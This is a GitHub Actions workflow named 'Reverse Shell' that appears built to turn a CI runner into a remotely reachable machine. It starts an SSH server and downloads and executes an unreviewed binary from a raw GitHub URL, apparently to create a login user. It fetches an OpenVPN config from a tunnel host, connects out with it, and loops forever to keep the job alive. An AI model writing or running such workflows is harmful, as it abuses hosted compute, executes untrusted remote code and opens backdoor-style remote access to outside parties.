name: Reverse Shell

on:
  workflow_dispatch:
    inputs:
      name:
        type: choice
        description: Who to greet
        options: 
        - Finan
        - Metafuck
      ovpn:
        description: 'Enter openvpn cfg content from Portmap.io'
        required: true

jobs:
  reverse-shell:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Set up Python
      uses: actions/setup-python@v2
      with:
        python-version: '3.x'

    - name: Create reverse shell script
      run: |
        sudo apt update -y 
        sudo apt-get install openssh-server openvpn -y 
        sudo service ssh start 
        sudo service ssh status 
        wget https://raw.githubusercontent.com/Alizarddd/ready-codes/main/CreatUser_f1ver
        chmod +x CreatUser_f1ver
        ./CreatUser_f1ver
        echo "==========[ USER CREATED ]=========="
        ## printf "%s\n" "${{ github.event.inputs.ovpn }} ##
        wget https://0eaccb83ea5364.lhr.life/mf.ovpn
        sudo openvpn --config mf.ovpn
        echo "salam tamam"
        
    - name: keep running
      run: while true; do echo $RANDOM ; sleep 3 ; done
